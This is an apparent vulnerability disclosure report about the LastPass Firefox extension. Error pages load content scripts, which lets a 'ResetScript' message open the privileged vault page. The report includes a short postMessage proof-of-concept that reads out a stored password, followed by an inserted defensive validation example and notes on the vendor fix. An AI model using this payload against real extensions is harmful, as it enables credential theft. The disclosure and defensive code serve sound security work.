
Issue 1217


Issue metadata

Status: Fixed
Closed: May 2017


LastPass: Firefox error pages still load Content Scripts, allowing access to ExtensionProxyService

Project Member Reported by, Mar 21 2017

Issue description

The fix for issue 1209 was to prevent loading the special domain ``. This works in Chrome, but Firefox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But... because the URL being opened is from an extension, it can open non-websafe URLs, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

            type: "ResetScript",
            data: [
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
        }, "*")

I uploaded a demo version here (this URL is secret):

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Attachment: Windows 7-2017-03-21-15-28-52.png (128 KB)
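The report describes two things going wrong at once: Firefox injects the content script into a network-error page (which has an opaque origin), and the proxied `ResetScript` handler accepts any URL, including privileged `resource://` paths. The following is an added illustration, not code from the report or from LastPass, of the kind of gate a content script could apply before relaying such a request. The message shape follows the PoC above; the function names, the `http(s)`-only scheme allowlist, the error-page check on the document URI and the sample messages are assumptions constructed for this example.

```javascript
// Added example (not LastPass code): a defensive gate a content script could
// apply before relaying a privileged "ResetScript"-style request to the
// extension's backend. The message shape follows the PoC in the report; the
// function names, the scheme allowlist and the sample messages are assumptions
// constructed for illustration.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Firefox network-error pages have a document URI under the about: scheme
// (about:neterror?...). A content script that finds itself in such a document
// should not relay anything, whatever the message says.
function isErrorPage(documentURI) {
  return typeof documentURI !== "string" || /^about:/i.test(documentURI);
}

// postMessage reports an opaque origin (error pages, sandboxed frames, data:
// documents) as the string "null"; anything that is not http(s) is untrusted.
function isTrustworthyOrigin(origin) {
  if (typeof origin !== "string" || origin === "null") return false;
  let u;
  try { u = new URL(origin); } catch { return false; }
  return ALLOWED_SCHEMES.has(u.protocol);
}

// The URL a request asks the extension to open must be an ordinary web URL;
// privileged schemes such as resource:, moz-extension: or about: are refused.
function isSafeTargetUrl(url) {
  if (typeof url !== "string") return false;
  let u;
  try { u = new URL(url); } catch { return false; }
  return ALLOWED_SCHEMES.has(u.protocol);
}

// Returns null when the request may be forwarded, otherwise the reason it is dropped.
function rejectReason(message, senderOrigin, documentURI) {
  if (isErrorPage(documentURI)) return "content script is running in an error page";
  if (!message || typeof message !== "object") return "message is not an object";
  if (message.type !== "ResetScript") return "unknown message type";
  const data = message.data;
  if (!data || typeof data !== "object" || Array.isArray(data)) return "missing request data";
  if (!isTrustworthyOrigin(senderOrigin)) return "sender origin is not a trusted web origin";
  if (!isSafeTargetUrl(data.url)) return "target URL scheme is not allowed";
  return null;
}

// Constructed sample: the shape of the report's PoC, with a placeholder
// extension path in place of the real one.
const SAMPLE_PRIVILEGED_REQUEST = {
  type: "ResetScript",
  data: {
    appId: 1,
    url: "resource://EXAMPLE-extension-id/data/vault.html",
    appName: "exploit",
    username: "root",
    script: "javascript:void 0",
  },
};

// Constructed sample: a benign request for an ordinary website.
const SAMPLE_WEB_REQUEST = {
  type: "ResetScript",
  data: { appId: 1, url: "https://example.com/login", appName: "example", username: "alice", script: "" },
};

// Runs the gate over three constructed situations and returns [label, reason] pairs.
function demo() {
  const cases = [
    ["PoC shape from an error page", SAMPLE_PRIVILEGED_REQUEST, "null", "about:neterror?e=dnsNotFound"],
    ["PoC shape from a web page", SAMPLE_PRIVILEGED_REQUEST, "https://untrusted.example", "https://untrusted.example/"],
    ["ordinary request", SAMPLE_WEB_REQUEST, "https://example.com", "https://example.com/login"],
  ];
  return cases.map(([label, msg, origin, docUri]) => [label, rejectReason(msg, origin, docUri)]);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, reason] of demo()) {
    console.log(label + ": " + (reason === null ? "forward" : "drop (" + reason + ")"));
  }
}
```

The two checks are independent on purpose: even if the browser stops injecting content scripts into error pages (the Mozilla-side fix the reporter mentions in comment 1), the extension side still has to refuse non-web target URLs, because a message from any ordinary page could otherwise name a `resource://` path.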
Project Member

Comment 1 by, Mar 22 2017

Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts, it feels unintentional. I'll file a low-priority bugzilla bug later today.
Project Member

Comment 2 by, May 4 2017

Status: Fixed (was: New)

Comment 3 Deleted
